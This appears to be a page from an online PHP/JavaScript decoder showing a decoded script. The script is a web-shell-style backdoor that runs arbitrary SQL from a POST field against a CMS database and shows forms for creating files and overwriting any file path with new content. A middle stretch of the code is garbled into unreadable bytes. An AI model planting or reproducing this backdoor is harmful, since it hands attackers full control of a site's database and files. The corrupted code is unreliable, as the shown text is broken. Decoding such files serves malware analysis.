Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


require_once('../config.php');

if (isset($_POST['code_sql'])) {
    if (!empty($_POST['codesql'])) {
        $result = $KNCMS->query($_POST['codesql']);
        if ($result) {
            $result = $result->fetch_array();
            echo '<h3>SQL Query Results:</h3>';
            foreach ($result as $datJHˆX	]H	ˆBH[HˆX	\܈^7WFr5VW'sТЧРb76WBE5Ev6FUfRuҒb76WBE5EvfVRuҒbbVGE5EvfVRuҒFfVRE5EvfVRuӰbfUW7G2FfVRFfT6FVG2fUvWE6FVG2FfVRV6sƇ#ƃ3fR6FVG33sV6&'"F7V66'2FfT6FVG2V6RV6tfRFW2BW7BsТЧУb76WBE5EwWFFUfRuҒb76WBE5EwWFFUfVRuҒbbVGE5EwWFFUfVRuҒbb76WBE5EvfU6FVBuҒGWFFTfVRE5EwWFFUfVRuӰFfT6FVBE5EvfU6FVBuӰbfUW7G2GWFFTfVRfUWE6FVG2GWFFTfVRFfT6FVBV6sƇ#fRWFFVB7V66W76gVǒsV6RV6tfRFW2BW7BsТЧ
<form method="POST">
    <h2>1</h2>
    <input type="text" name="codesql" placeholder="" required>
    <button type="submit" name="code_sql" class="btn btn-primary">Test</button>
</form>

<form method="POST">
    <h2>2</h2>
    <input type="text" name="filename" placeholder="" required>
    <button type="submit" name="code_file" class="btn btn-primary">Ghi</button>
</form>


<form method="POST">
    <h2>Update File Content</h2>
    <input type="text" name="update_filename" placeholder="File Path" required>
    <textarea name="file_content" rows="10" cols="50" placeholder="New file content" required></textarea>
    <button type="submit" name="update_file" class="btn btn-primary">Update File</button>
</form>



© 2023 Quttera Ltd. All rights reserved.